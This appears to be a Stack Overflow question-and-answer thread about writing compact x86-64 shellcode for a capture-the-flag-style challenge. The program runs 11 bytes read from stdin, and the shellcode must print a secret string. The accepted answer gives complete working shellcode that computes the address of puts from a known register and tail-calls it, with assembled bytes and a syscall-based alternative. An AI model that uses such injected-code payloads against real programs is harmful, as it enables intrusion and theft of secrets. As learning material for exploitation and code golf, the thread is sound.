Compact shellcode to print a 0-terminated string pointed-to by a register, given puts or printf at known absolute addresses?

Question

Background: I am a beginner trying to understand how to golf assembly, in particular to solve an online challenge.

EDIT: clarification: I want to print the value at the memory address of RDX. So “SUPER SECRET!”

Create some shellcode that can output the value of register RDX in <= 11 bytes. Null bytes are not allowed.

The program is compiled with the c standard library, so I have access to the puts / printf statement. It’s running on x86 amd64.

$rax   : 0x0000000000010000  →  0x0000000ac343db31
$rdx   : 0x0000555555559480  →  "SUPER SECRET!"
gef➤  info address puts
Symbol "puts" is at 0x7ffff7e3c5a0 in a file compiled without debugging.
gef➤  info address printf
Symbol "printf" is at 0x7ffff7e19e10 in a file compiled without debugging.

Here is my attempt (intel syntax)

xor ebx, ebx ; zero the ebx register
inc ebx ; set the ebx register to 1 (STDOUT
xchg ecx, edx ; set the ECX register to RDX
mov edx, 0xff ; set the length to 255
mov eax, 0x4 ; set the syscall to print
int 0x80 ; interrupt

hexdump of my code

My attempt is 17 bytes and includes null bytes, which aren't allowed. What other ways can I lower the byte count? Is there a way to call puts / printf while still saving bytes?

FULL DETAILS:

I am not quite sure what is useful information and what isn't.

File details:

ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5810a6deb6546900ba259a5fef69e1415501b0e6, not stripped

Source code:

void main() {
        char* flag = get_flag(); // I don't get access to the function details
        char* shellcode = (char*) mmap((void*) 0x1337,12, 0, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        mprotect(shellcode, 12, PROT_READ | PROT_WRITE | PROT_EXEC);
        fgets(shellcode, 12, stdin);
        ((void (*)(char*))shellcode)(flag);
}

Disassembly of main:

gef➤  disass main
Dump of assembler code for function main:
   0x00005555555551de <+0>:     push   rbp
   0x00005555555551df <+1>:     mov    rbp,rsp
=> 0x00005555555551e2 <+4>:     sub    rsp,0x10
   0x00005555555551e6 <+8>:     mov    eax,0x0
   0x00005555555551eb <+13>:    call   0x555555555185 <get_flag>
   0x00005555555551f0 <+18>:    mov    QWORD PTR [rbp-0x8],rax
   0x00005555555551f4 <+22>:    mov    r9d,0x0
   0x00005555555551fa <+28>:    mov    r8d,0xffffffff
   0x0000555555555200 <+34>:    mov    ecx,0x22
   0x0000555555555205 <+39>:    mov    edx,0x0
   0x000055555555520a <+44>:    mov    esi,0xc
   0x000055555555520f <+49>:    mov    edi,0x1337
   0x0000555555555214 <+54>:    call   0x555555555030 <mmap@plt>
   0x0000555555555219 <+59>:    mov    QWORD PTR [rbp-0x10],rax
   0x000055555555521d <+63>:    mov    rax,QWORD PTR [rbp-0x10]
   0x0000555555555221 <+67>:    mov    edx,0x7
   0x0000555555555226 <+72>:    mov    esi,0xc
   0x000055555555522b <+77>:    mov    rdi,rax
   0x000055555555522e <+80>:    call   0x555555555060 <mprotect@plt>
   0x0000555555555233 <+85>:    mov    rdx,QWORD PTR [rip+0x2e26]        # 0x555555558060 <stdin@@GLIBC_2.2.5>
   0x000055555555523a <+92>:    mov    rax,QWORD PTR [rbp-0x10]
   0x000055555555523e <+96>:    mov    esi,0xc
   0x0000555555555243 <+101>:   mov    rdi,rax
   0x0000555555555246 <+104>:   call   0x555555555040 <fgets@plt>
   0x000055555555524b <+109>:   mov    rax,QWORD PTR [rbp-0x10]
   0x000055555555524f <+113>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x0000555555555253 <+117>:   mov    rdi,rdx
   0x0000555555555256 <+120>:   call   rax
   0x0000555555555258 <+122>:   nop
   0x0000555555555259 <+123>:   leave
   0x000055555555525a <+124>:   ret

Register state right before shellcode is executed:

$rax   : 0x0000000000010000  →  "EXPLOIT\n"
$rbx   : 0x0000555555555260  →  <__libc_csu_init+0> push r15
$rcx   : 0x000055555555a4e8  →  0x0000000000000000
$rdx   : 0x0000555555559480  →  "SUPER SECRET!"
$rsp   : 0x00007fffffffd940  →  0x0000000000010000  →  "EXPLOIT\n"
$rbp   : 0x00007fffffffd950  →  0x0000000000000000
$rsi   : 0x4f4c5058
$rdi   : 0x00007ffff7fa34d0  →  0x0000000000000000
$rip   : 0x0000555555555253  →  <main+117> mov rdi, rdx
$r8    : 0x0000000000010000  →  "EXPLOIT\n"
$r9    : 0x7c
$r10   : 0x000055555555448f  →  "mprotect"
$r11   : 0x246
$r12   : 0x00005555555550a0  →  <_start+0> xor ebp, ebp
$r13   : 0x00007fffffffda40  →  0x0000000000000001
$r14   : 0x0
$r15   : 0x0

(This register state is a snapshot at the assembly line below)

●→ 0x555555555253 <main+117>       mov    rdi, rdx
   0x555555555256 <main+120>       call   rax

`gets` is dangerous, you should never use it. And your question is operating system, processor, and calling convention specific. Did you read wikipedia on [x86 calling conventions](https://en.wikipedia.org/wiki/X86_calling_conventions)? Are you allowed to use [libgccjit](https://gcc.gnu.org/onlinedocs/jit/) ? Did you study the source code of simple C compilers like [tinycc](https://en.wikipedia.org/wiki/Tiny_C_Compiler) ? Did you compile some C code with [GCC](http://gcc.gnu.org/) invoked as `gcc -Wall -Wextra -fverbose-asm -O2 -S` — Basile Starynkevitch, Apr 24 '21 at 06:07
@BasileStarynkevitch Thanks for your comment. I have edited the question to include architecture and assembly flavor. I am a little confused why you mention “gets” as my code is trying to run “puts” though? — Peter Stenger, Apr 24 '21 at 06:11
You want to output `0x0000555555559480`? Or as decimal, see [How do I print an integer in Assembly Level Programming without printf from the c library?](https://stackoverflow.com/a/46301894) for doing it without printf. Or did you mean the string *pointed-to* by RDX? Also, I don't see why you're using 32-bit `int 0x80` in 64-bit code. RSP and RDX are both outside the low 32 bits, so you can't pass a buffer to `write` via that ABI. [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](https://stackoverflow.com/q/46087730) — Peter Cordes, Apr 24 '21 at 06:13
@PeterCordes The string at that memory address. Sorry for the confusión. — Peter Stenger, Apr 24 '21 at 06:14
Your question needs some [mre] - so some C or assembler code with the commands used to compile or assemble it. Read documentation of [GCC](http://gcc.gnu.org/) and of [GNU binutils](https://www.gnu.org/software/binutils/) and specifications like the [Linux x86-64 ABI](https://refspecs.linuxbase.org/elf/x86_64-abi-0.99.pdf) — Basile Starynkevitch, Apr 24 '21 at 06:14
Is the string 0-terminated, so you could pass it to `printf("%c%s\n", dummy, rdx)`, for example? Or push rdx` / `pop rdi` for `jmp puts`? But this is supposed to be shellcode, so are you *sure* you can call libc functions? A `jmp` or `call rel32` won't reach unless you know the relative distance between your shellcode location and the libc address (or their PLT stubs), and that distance is withing +-2GiB. Oh, it gives you their absolute addresses; I guess it's dangling that in front of you if you want to try to `jmp reg`, since you apparently don't know your own address? — Peter Cordes, Apr 24 '21 at 06:19
@PeterCordes These are all great comments. I’m sorry for an incomplete post, I will update this question with all these additional details in the morning. — Peter Stenger, Apr 24 '21 at 06:23
@BasileStarynkevitch: Even `clang -Oz` for code-size optimization is unlikely to make something useful, even if you come up with a strategy to try (like call via func ptr). I think you haven't understood the question, which is about writing *shellcode* to run in the environment described in the question. It's not missing a [mcve] per-se; it contains a broken attempt but is asking for alternatives, not specifically how to fix that. (Although it would be good if the question realized that the attempt wouldn't work, and had a test-case so people could play with this other than in their heads.) — Peter Cordes, Apr 24 '21 at 06:25
The code you've given uses a system call directly. If you want to use a c library function, just use the `call` instruction. — Emanuel P, Apr 24 '21 at 06:26
@EmanuelP: "just" use `call`? Not that simple from shellcode, see my previous comment. You aren't given your shellcode's own address (so IDK how a code-injection exploit was supposed to have transferred control to your executable payload in the first place without knowing an absolute return address.) But anyway, it seems the code has to run from a random (stack?) address, so you can't include a `call rel32` or `jmp rel32` to reach either of the specified absolute addresses for `printf` or `puts`. If you mean `mov rax, 0x7ffff7e3c5a0` / `call rax`, that's already 12 bytes and includes zeros. — Peter Cordes, Apr 24 '21 at 06:30
@PeterCordes I am just adding more details now, please take another look. Thanks for your patience. — Peter Stenger, Apr 24 '21 at 06:34
@PeterCordes I just now added the register states as well, if that is something that could be helpful. I hope I'm not overdoing the details... — Peter Stenger, Apr 24 '21 at 06:41
Huh, surprisingly mmap does still work with a hint address that's not page-aligned (like `0x1337`). It returns `0x10000` ([mmap_min_addr](https://wiki.debian.org/mmap_min_addr), the nearest legal page address), I guess that's why you have RAX=0x10000 in a debug build, because that's your function pointer. It also doesn't make sense to `mprotect` a size of 12 bytes because it actually applies to the whole page, but Linux allows that, too. (And yeah, `fgets` will read a 0-terminated string from stdin, limited to 11 bytes before the 0. And also stopping at a newline 0xa byte) — Peter Cordes, Apr 24 '21 at 06:44
Oh, you're allowed to take advantage of known other registers like RSP, RBP, and RDI? They're within 2GiB of printf and puts so you can make a function pointer with only a rel32 (e.g. using LEA or ADD). — Peter Cordes, Apr 24 '21 at 06:46
@PeterCordes that’s gotta be it. I didn’t think about using existing register values and performing math to get to the correct printf/puts address. — Peter Stenger, Apr 24 '21 at 06:49
Also I said null bytes aren’t allowed because from my understanding it would not work correctly with null bytes. Im sure you have a much deeper understanding, so if they work, they are allowed haha — Peter Stenger, Apr 24 '21 at 06:54
Yup, using LEA that way is a variation of [Tips for golfing in x86/x64 machine code](https://codegolf.stackexchange.com/a/132985) - using stuff like `lea ecx, [rax + 4]` to set ECX=4 given a known value of `0` in EAX. — Peter Cordes, Apr 24 '21 at 07:00
re: `0` bytes (ASCII NUL): `fgets` actually *can* read a `0`, my earlier comment was wrong to list that as another byte to avoid. The critical character is `0xa` aka `'\n'` newline, *not* `'\0'`. See [Is it possible to read null characters correctly using fgets or gets\_s?](https://stackoverflow.com/a/50160115). Often buffer overflows exploit a `strcpy` or something else that stops on a `0` byte, but `fgets` only stops on EOF, newline, or the buffer size. (This program is using it to simulate plain `gets` which doesn't take a buffer size, so can be vulnerable to buffer overflow.) — Peter Cordes, Apr 24 '21 at 07:06

score 1 · Accepted Answer · answered Apr 24 '21 at 08:04

Since I already spilled the beans and "spoiled" the answer to the online challenge in comments, I might as well write it up. 2 key tricks:

Create 0x7ffff7e3c5a0 (&puts) in a register with lea reg, [reg + disp32], using the known value of RDI which is within the +-2^31 range of a disp32. (Or use RBP as a starting point, but not RSP: that would need a SIB byte in the addressing mode).

This is a generalization of the code-golf trick of lea edi, [rax+1] trick to create small constants from other small constants (especially 0) in 3 bytes, with code that runs less slowly than push imm8 / pop reg.

The disp32 is large enough to not have any zero bytes; you have a couple registers to choose from in case one had been too close.
Copy a 64-bit register in 2 bytes with push reg / pop reg, instead of 3-byte mov rdi, rdx (REX + opcode + modrm). No savings if either push needs a REX prefix (for R8..R15), and actually costs bytes if both are "non-legacy" registers.

See other answers on Tips for golfing in x86/x64 machine code on codegolf.SE for more.

bits 64
  lea  rsi, [rdi - 0x166f30]
       ;; add rbp, imm32          ; alternative, but that would mess up a call-preserved register so we might crash on return.
  push rdx
  pop  rdi      ; copy RDX to first arg, x86-64 SysV calling convention
  jmp  rsi      ; tailcall puts

This is exactly 11 bytes, and I don't see a way for it to be smaller. add r64, imm32 is also 7 bytes, same as LEA. (Or 6 bytes if the register is RAX, but even the xchg rax, rdi short form would cost 2 bytes to get it there, and the RAX value is still the fgets return value, which is the small mmap buffer address.)

The puts function pointer doesn't fit in 32 bits, so we need a REX prefix on any instruction that puts it into a register. Otherwise we could just mov reg, imm32 (5 bytes) with the absolute address, not deriving it from another register.

$ nasm -fbin -o exploit.bin -l /dev/stdout exploit.asm
     1                                  bits 64
     2 00000000 488DB7D090E9FF          lea  rsi, [rdi - 0x166f30]
     3                                  ;; add rbp, imm32          ; we can avoid messing up any call-preserved registers
     4 00000007 52                      push rdx
     5 00000008 5F                      pop  rdi      ; copy to first arg
     6 00000009 FFE6                    jmp  rsi      ; tailcall
$ ll exploit.bin
-rw-r--r-- 1 peter peter 11 Apr 24 04:09 exploit.bin
$ ./a.out < exploit.bin      # would work if the addresses in my build matched yours

My build of your incomplete .c uses different addresses on my machine, but it does reach this code (at address 0x10000, mmap_min_addr which mmap picks after the amusing choice of 0x1337 as a hint address, which isn't even page aligned but doesn't result in EIVAL on current Linux.)

Since we only tailcall puts with correct stack alignment and don't modify any call-preserved registers, this should successfully return to main.

Note that 0 bytes (ASCII NUL, not NULL) would actually work in shellcode for this test program, if not for the requirement that forbids it.

The input is read using fgets (apparently to simulate a gets() overflow). fgets actually can read a 0 aka '\0'; the only critical character is 0xa aka '\n' newline. See Is it possible to read null characters correctly using fgets or gets_s?

Often buffer overflows exploit a strcpy or something else that stops on a 0 byte, but fgets only stops on EOF or newline. (Or the buffer size, a feature gets is missing, hence its deprecation and removal from even the ISO C standard library! It's literally impossible to use safely unless you control the input data). So yes, it's totally normal to forbid zero bytes.

BTW, your int 0x80 attempt is not viable: What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? - you can't use the 32-bit ABI to pass 64-bit pointers to write, and the string you want to output is not in the low 32 bits of virtual address space.

Of course, with the 64-bit syscall ABI, you're fine if you can hardcode the length.

    push rdx
    pop  rsi
    shr  eax, 16    ; fun 3-byte way to turn 0x10000` into `1`, __NR_write 64-bit, instead of just push 1 / pop
    mov  edi, eax   ; STDOUT_FD = __NR_write 
    lea  edx, [rax + 13 - 1]       ; 3 bytes.  RDX = 13 = string length
      ; or   mov dl, 0xff          ; 2 bytes  leaving garbage in rest of RDX
    syscall

But this is 12 bytes, as well as hard-coding the length of the string (which was supposed to be part of the secret?).

mov dl, 0xff could make sure the length was at least 255, and actually much more in this case, if you don't mind getting reams of garbage after the string you want, until write hits an unmapped page and returns early. That would save a byte, making this 11.

(Fun fact, Linux write does not return an error when it's successfully written some bytes; instead it returns how many it did write. If you try again with buf + write_len, you would get a -EFAULT return value for passing a bad pointer to write.)

(I was going to put the code blocks in spoiler quotes to at least hide the fully worked out copy-pasteable version, but it seems markdown doesn't allow that.) — Peter Cordes, Apr 24 '21 at 08:05
Hi Peter, It appears that I messed up my initial question. After the `mov rdi, rdx` command, the value in RDI would be overwritten with `"SUPER SECRET"`, so we cannot use the value in that register to set the address. — Peter Stenger, Apr 24 '21 at 16:21
@PeterStenger: That's why my shellcode calculates a function pointer in another register, using LEA to copy-and-add, *before* overwriting RDI with RDX. I picked RSI, I could have picked RAX or RCX. (Any call-clobbered register that doesn't need a REX for `jmp reg`, and which isn't RDX or RDI. So that leaves RSI, RAX, and RCX). Try single-stepping it in GDB. — Peter Cordes, Apr 25 '21 at 00:44

Compact shellcode to print a 0-terminated string pointed-to by a register, given puts or printf at known absolute addresses?

1 Answers1